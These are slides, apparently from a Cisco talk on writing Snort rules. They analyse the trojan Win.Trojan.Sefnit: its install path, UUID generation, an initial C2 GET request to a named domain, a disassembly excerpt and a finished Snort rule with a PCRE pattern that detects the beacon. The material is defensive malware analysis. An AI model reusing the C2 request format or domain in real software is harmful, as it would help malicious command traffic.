  • 77. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting > Malware Command Traffic
  • 78. Malware Sample Overview Win.Trojan.Sefnit Upon execution Win.Trojan.Sefnit drops a service to %AppData%Updaterupdater.dll and starts it. When the service updater.dll starts it attempts to read tasks from the configuration file %AppData%Updater/~conf.dat Initially the conf.dat file doesn't exist. The sample obtains the Disk Volume Serial number and appends it to the MachineGUID. This string is then encrypted. The sample uses 16 bytes of the encrypted value and converts it to a 32 character hex string and uses this string as a UUID sent in the initial request to C2: GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1 Host: axnlze.net Accept: */* The URI above has the following hardcoded format: hxxp://<c2domain>/j/<uuid>/<version>
  • 79. Malware Sample Disassembly 10015B27 PUSH 10112E28 ; /Arg1 = UNICODE ;"c2.net/j/<uuid>/<version>" 10015B2C LEA ECX,DWORD PTR SS:[EBP-4C] ; | 10015B2F CALL <_wcslen-copystr> ; updater.10001BA4 10015B34 MOV BYTE PTR SS:[EBP-4],1 10015B38 MOV EDI,10112E14 ; UNICODE "<uuid>" 10015B3D PUSH EDI ; /Arg1 => 10112E14 10015B3E CALL <_wcslen> ; updater.100196E1 ... 10015BBB PUSH ESI ; UNICODE "<version>" 10015BBC LEA ECX,DWORD PTR SS:[EBP-4C] 10015BBF CALL <substr_loc> 10015BC4 MOV DWORD PTR SS:[EBP-1DC],EAX 10015BCA PUSH ESI ; UNICODE "<version>" 10015BCB CALL <_wcslen> 10015BD0 MOV DWORD PTR SS:[EBP-1EC],EAX 10015BD6 MOV EDI,10112E08 ; UNICODE "0001" ... 1005A043 PUSH 0 ; /Arg4 = 00000000 1005A045 PUSH ECX ; |Arg3 = 008DAA60 ASCII ; "/j/20a0b8237d5b084e46bd673e26d948bf/0001" 1005A046 PUSH EBX ; |Arg2 = 1011B340 ASCII "GET" 1005A047 PUSH EDI ; |Arg1 008C9138 = NULL 1005A048 CALL 10058E00 ; updater.10058E00
  • 80. Malware Command Traffic Detection # # C2 request detection # # hardcoded urilen urilen:40,norm; # hardcoded uri pattern, begins with "/j/" content:"/j/"; depth:3; http_uri; # ends with "/0001" content:"/0001"; distance:32; within:5; http_uri; # no User-Agent in C2 request content:!"User-Agent"; http_header; # final verification of C2 URI pattern pcre:"/^x2fjx2f[a-f0-9]{32}x2f0001$/U";
  • 81. Malware Command Traffic Detection alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS ( msg:"MALWARE-CNC Win.Trojan.Sefnit variant outbound connection attempt"; flow:to_server,established; urilen:40,norm; content:"/j/"; depth:3; http_uri; content:"/0001"; within:5; distance:32; http_uri; content:!"User-Agent"; http_header; pcre:"/^x2fjx2f[a-f0-9]{32}x2f0001$/U"; metadata:impact_flag red, service http; classtype:trojan-activity; )
  • 82. Call to Action ‱ Related sessions: ‱ Introduction to Snort Rule Writing ‱ Detection Strategies with Snort [DevNet-1126] ‱ Visit the World of Solutions for ‱ Cisco Campus ‱ Walk in Labs ‱ Technical Solution Clinics ‱ Meet the Engineer - Available immediately after this talk.